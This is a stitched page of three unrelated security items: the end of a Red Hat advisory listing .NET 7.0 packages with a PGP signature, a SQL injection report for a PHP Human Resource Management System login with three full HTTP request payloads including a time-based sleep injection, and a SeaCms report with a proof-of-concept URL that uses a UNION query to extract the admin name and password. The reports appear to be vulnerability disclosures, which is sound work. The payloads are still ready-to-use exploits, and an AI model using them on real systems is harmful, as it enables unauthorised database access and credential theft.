dotnet-sdk-7.0-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-templates-7.0-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
netstandard-targeting-pack-2.1-7.0.100-0.5.rc2.el9_1.ppc64le.rpm

s390x:  
aspnetcore-runtime-7.0-7.0.0-0.5.rc2.el9_1.s390x.rpm  
aspnetcore-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-apphost-pack-7.0-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-host-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-hostfxr-7.0-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-runtime-7.0-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-sdk-7.0-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-templates-7.0-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.s390x.rpm  
netstandard-targeting-pack-2.1-7.0.100-0.5.rc2.el9_1.s390x.rpm

x86_64:  
aspnetcore-runtime-7.0-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
aspnetcore-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-apphost-pack-7.0-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-host-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-hostfxr-7.0-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-runtime-7.0-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-sdk-7.0-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet-targeting-pack-7.0-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-templates-7.0-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
netstandard-targeting-pack-2.1-7.0.100-0.5.rc2.el9_1.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.aarch64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.aarch64.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.aarch64.rpm

ppc64le:  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.ppc64le.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.ppc64le.rpm

s390x:  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.s390x.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.s390x.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.s390x.rpm

x86_64:  
dotnet-apphost-pack-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-host-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.0-0.5.rc2.el9_1.x86_64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet7.0-debuginfo-7.0.100-0.5.rc2.el9_1.x86_64.rpm  
dotnet7.0-debugsource-7.0.100-0.5.rc2.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41032  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3PgudzjgjWX9erEAQiiDg//cdj0qT3ay37iZak9REN0Azfp5yzrAL3P  
7RYtgqDyQ5kVVojzzsto2zqTAQcdkqUutH5RSr4BX/j5H0/yLDPf2MweJv3zzVMf  
DUoftsjVIzCaC+ABZkKx0bsZj+m0Dtm92CP9Zq8pRSg9Np4v+EDI60+jRKDgQ+tN  
mDpDiRjseUlH9EF3DRYfDV7X/xKmBBOoUSRtjWRRAxrSTl8Hm6VD3ZPjsnyLOIar  
jXEGfzvD9uSHPeGRq7WXq+Z9hQsuGI/ioE7gmBB+z8jGM1fYI/FuEntEEVX5bngh  
7gDj0GDIp2KAhN8rsQLSamBtfAXlCSTfLj9aKfiYDawf8AVezZq5k4Gc0+wVJvD7  
xKKTXdmuRwVmUg10bpM06Q55f137m7koAcd0pnu2+fLCe2xa3M7hGUA1hyNcDQJG  
5VUar3m4tOsUNGvkjWMUlr0k1WBq0iygpNAj/fwcSf/NyxMs05GPk+vd62HeDuhk  
4mZ/XoEuvCd9nfwWFdqWrUKtF5rZJjNdaySree1hT5z2X182avaUC9BkUqM6qz9j  
ZvHMhTHQanD8PKZCTSZ5TSkArotnaU3ll+/FeIN+Aokhe0fQ68auoUBkoRyXsXtV  
1cyCXxHrAtv4WEJqfXQ/AIPVQydILJoMQgWaEUOGGnnZPOm67RAjanH9bf6Mrc4A  
XWImElHJm1o=TYQK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8434-01

Human Resource Management System v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /hrm/controller/login.php.

**Human Resource Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Deven

vendors:https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html

Vulnerability File: /hrm/controller/login.php

POST parameter 'password' exists SQL injection vulnerability

Payload1: name=ab&password=cd'&submit=Sign+In

    POST /hrm/controller/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=vilo7csum7e88k93vn9tfo8beb
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/hrm/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 35
    
    name=ab&password=cd'&submit=Sign+In
    

Payload2: name=ab&password=cd''&submit=Sign+In

    POST /hrm/controller/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=vilo7csum7e88k93vn9tfo8beb
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/hrm/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 36
    
    name=ab&password=cd''&submit=Sign+In
    

Payload3: name=ab&password=cd'%2b(select\*from(select(sleep(5)))q)%2b'&submit=Sign+In

    POST /hrm/controller/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=vilo7csum7e88k93vn9tfo8beb
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/hrm/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 74
    
    name=ab&password=cd'%2b(select*from(select(sleep(20)))q)%2b'&submit=Sign+In
    

The server response time is 20 seconds

CVE-2022-43262: bug_report/SQLi-1.md at main · null302/bug_report

SeaCms before v12.6 was discovered to contain a SQL injection vulnerability via the component /js/player/dmplayer/dmku/index.php.

There is no verification permission for this file  
http://xxx.com/js/player/dmplayer/dmku/index.php  

In line 50, "ac" is passed in through the GET method, the value of ac is "so", and the logic judgment is entered. The parameter key is passed into the function without any filtering: 搜索弹幕  

In the function "搜索弹幕", the parameter key is also brought into the "搜索\_弹幕池" without any filtering.  

In the function "搜索\_弹幕池", the key is directly spliced ​​into the SQL query statement and causes sql injection.  

poc:  
http://xxx.com/js/player/dmplayer/dmku/index.php?ac=so&key=1%27%20union%20select%20null,null,null,null,null,name,null,null,null,password%20from%20sea\_admin%20where%20id=1--%20-  

Sqlmap:

Tag

#sql